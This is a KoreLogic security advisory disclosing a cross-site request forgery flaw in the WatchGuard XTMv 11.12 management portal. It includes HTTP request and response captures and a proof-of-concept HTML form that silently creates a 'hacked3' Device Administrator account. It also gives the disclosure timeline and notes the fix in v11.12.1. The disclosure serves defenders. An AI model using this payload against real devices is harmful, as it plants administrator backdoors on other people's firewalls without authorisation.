WatchGuard XTMv 11.12 Build 516911 - User Management Cross-Site Request Forgery Vulnerability

ID 1337DAY-ID-27284
Type zdt
Reporter KoreLogic
Modified 2017-03-11T00:00:00


Exploit for hardware platform in category web applications

KL-001-2017-004 : WatchGuard XTMv User Management Cross-Site Request Forgery
Title: WatchGuard XTMv User Management Cross-Site Request Forgery
Advisory ID: KL-001-2017-004
Publication Date: 2017.03.10
Publication URL:
1. Vulnerability Details
     Affected Vendor: WatchGuard
     Affected Product: XTMv
     Affected Version: v11.12 Build 516911
     Platform: Embedded Linux
     CWE Classification: CWE-352: Cross-Site Request Forgery (CSRF)
     Impact: Privileged Access
     Attack vector: HTTP
2. Vulnerability Description
     Lack of CSRF protection in the Add User functionality of the
     XTMv management portal can be leveraged to create arbitrary
     administrator-level accounts.
3. Technical Description
     As observed below, no CSRF token is in use when adding a new
     user to the management portal.
     POST /put_data/ HTTP/1.1
     Accept: */*
     Accept-Language: en-US,en;q=0.5
     Accept-Encoding: gzip, deflate, br
     Content-Type: application/json
     X-Requested-With: XMLHttpRequest
     Content-Length: 365
     Cookie: session_id=50f607247265897581a407bfb8b75e30d2b77287
     DNT: 1
     Connection: close
     The HTTP response indicates that the changes were successful.
     HTTP/1.1 200 OK
     X-Frame-Options: SAMEORIGIN
     Content-Length: 68
     Expires: Sun, 28 Jan 2007 00:00:00 GMT
     Vary: Accept-Encoding
     Server: CherryPy/3.6.0
     Pragma: no-cache
     Cache-Control: no-cache, must-revalidate
     Date: Sat, 10 Dec 2016 18:08:22 GMT
     Content-Type: application/json
     Set-Cookie: session_id=50f607247265897581a407bfb8b75e30d2b77287; expires=Sat, 10 Dec 2016 19:08:22 GMT; httponly;
Path=/; secure
     Connection: close
     {"status": true, "message": ["The changes were saved successfully"]}
     Now, the newly created backdoor account can be accessed.
     POST /agent/login HTTP/1.1
     Accept: application/xml, text/xml, */*; q=0.01
     Accept-Language: en-US,en;q=0.5
     Accept-Encoding: gzip, deflate, br
     Content-Type: text/xml
     X-Requested-With: XMLHttpRequest
     Content-Length: 414
     Cookie: sessionid=515F007C5BD062C2122008544DB127F80000000C; session_id=0a3d24668f5c3b2c7ba7016d179f5f574e1aaf53
     DNT: 1
     Connection: close
     The response below shows the application issuing an authenticated
     session cookie.
     HTTP/1.1 200 OK
     X-Frame-Options: SAMEORIGIN
     Content-type: text/xml
     Set-Cookie: sessionid=74B0DC5119495CFF2AE8944A625558EC00000008;secure;HttpOnly
     Connection: close
     Date: Sat, 10 Dec 2016 19:55:26 GMT
     Server: none
     Content-Length: 751
     <?xml version="1.0"?>
4. Mitigation and Remediation Recommendation
     The vendor has remediated this vulnerability in WatchGuard
     XTMv v11.12.1. Release notes and upgrade instructions are
     available at:
5. Credit
     This vulnerability was discovered by Matt Bergin (@thatguylevel)
     of KoreLogic, Inc. and Joshua Hardin.
6. Disclosure Timeline
     2017.01.13 - KoreLogic sends vulnerability report and PoC to
     2017.01.13 - WatchGuard acknowledges receipt of report.
     2017.01.23 - WatchGuard informs KoreLogic that the
                  vulnerability will be addressed in the forthcoming
                  v11.12.1 firmware, scheduled for general
                  availability on or around 2017.02.21.
     2017.02.22 - WatchGuard releases v11.12.1.
     2017.03.10 - KoreLogic public disclosure.
7. Proof of Concept
         <form action="" method="POST" enctype="text/plain">
           <input type="hidden"
name="{"__class__":"PageSystemManageAdminUsersObj","__module__":"","users":[],"add_entries":[{"__class__":"AdminUserObj","__module__":"modules.scripts.vo.AdminUserObj","name":"hacked3","domain":"Firebox-DB","role":"Device Administrator","hash":"hacked3","enabled":1,"rowindex":-1}],"upd_entries":[],"del_entries":[]}"
value="" />
           <input type="submit" value="Trigger" />
The contents of this advisory are copyright(c) 2017
KoreLogic, Inc. and are licensed under a Creative Commons
Attribution Share-Alike 4.0 (United States) License:
KoreLogic, Inc. is a founder-owned and operated company with a
proven track record of providing security services to entities
ranging from Fortune 500 to small and mid-sized companies. We
are a highly skilled team of senior security consultants doing
by-hand security assessments for the most important networks in
the U.S. and around the world. We are also developers of various
tools and resources aimed at helping the security community.
Our public vulnerability disclosure policy is available at:

# [2018-04-11]  #